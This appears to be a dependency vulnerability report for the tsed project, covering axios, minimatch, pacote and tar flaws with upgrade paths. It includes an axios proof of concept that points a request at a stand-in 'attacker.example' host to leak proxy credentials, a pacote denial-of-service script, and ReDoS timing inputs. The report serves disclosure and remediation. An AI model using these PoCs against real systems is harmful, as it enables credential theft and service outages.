Vulnerabilities

24 via 449 paths

Dependencies

565

Source

GitHub

Find, fix and prevent vulnerabilities in your code.

Severity
  • 11
  • 13
Status
  • 24
  • 0
  • 0

high severity
new

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: axios
  • Introduced through: axios@1.15.2

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed axios@1.15.2
    Remediation: Upgrade to axios@1.16.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in the setProxy function. An attacker can obtain sensitive proxy credentials by controlling a redirect target and causing the application to follow a redirect from a proxied request to a direct connection, resulting in the Proxy-Authorization header being sent to the attacker's server.

Note:

This is only exploitable if the application is running in Node.js with automatic redirects enabled and uses an authenticated proxy configuration, where the redirect target resolves to a direct connection (such as when HTTPS_PROXY is unset or excluded by NO_PROXY).

Workaround

This vulnerability can be mitigated by setting maxRedirects: 0 and handling redirects manually, or by ensuring proxy environment variables are configured consistently across protocols to prevent unexpected changes from proxied to direct connections.

PoC

process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

await axios.get('http://attacker.example/start');

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

high severity

Inefficient Algorithmic Complexity

  • Vulnerable module: minimatch
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @nx/devkit@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 nx@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @nx/devkit@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 nx@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 minimatch@3.0.5
    Remediation: Upgrade to lerna@9.0.5.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 minimatch@3.0.5
    Remediation: Upgrade to lerna@9.0.5.

Overview

minimatch is a minimal matching utility.

Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity via the matchOne function. An attacker can cause significant delays in processing and stall the event loop by supplying specially crafted glob patterns containing multiple non-adjacent GLOBSTAR segments.

Remediation

Upgrade minimatch to version 3.1.3, 4.2.5, 5.1.8, 6.2.2, 7.4.8, 8.0.6, 9.0.7, 10.2.3 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: minimatch
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @nx/devkit@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 nx@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @nx/devkit@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 nx@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 minimatch@3.0.5
    Remediation: Upgrade to lerna@9.0.5.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 minimatch@3.0.5
    Remediation: Upgrade to lerna@9.0.5.

Overview

minimatch is a minimal matching utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the AST class, caused by catastrophic backtracking when an input string contains many * characters in a row, followed by an unmatched character.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade minimatch to version 3.1.3, 4.2.4, 5.1.7, 6.2.1, 7.4.7, 8.0.5, 9.0.6, 10.2.1 or higher.

References

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: minimatch
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @nx/devkit@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 nx@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @nx/devkit@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 nx@19.8.15 minimatch@9.0.3
    Remediation: Upgrade to lerna@9.0.1.

Overview

minimatch is a minimal matching utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker can cause excessive resource consumption and application unresponsiveness by supplying specially crafted nested extglob patterns that trigger catastrophic backtracking in the regular expression engine.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade minimatch to version 8.0.6, 9.0.7, 10.2.3 or higher.

References

high severity
new

Denial of Service (DoS)

  • Vulnerable module: pacote
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6
    Remediation: Upgrade to lerna@9.0.0.

Overview

pacote is a JavaScript package downloader

Affected versions of this package are vulnerable to Denial of Service (DoS) via the addGitSha function. An attacker can exploit this vulnerability by supplying a specially crafted spec.rawSpec value that triggers the function’s regex replacement and string-manipulation logic, causing excessive CPU consumption and potentially stalling or crashing the process.

PoC

const addGitSha = require('pacote/lib/util/add-git-sha');

var str = "";
for (var i = 0; i < 1000000; i++) {
  str += "#";
}
str += "\n@";

const spec = {
  rawSpec: str,
  hosted: null,
};

console.log("start");
addGitSha(spec, "");
console.log("end");

// run `npm install pacote` and `node attack.js` 
// then the program will stuck forever with high CPU usage

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade pacote to version 21.5.1 or higher.

References

high severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.5.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.5.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmaccess@8.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
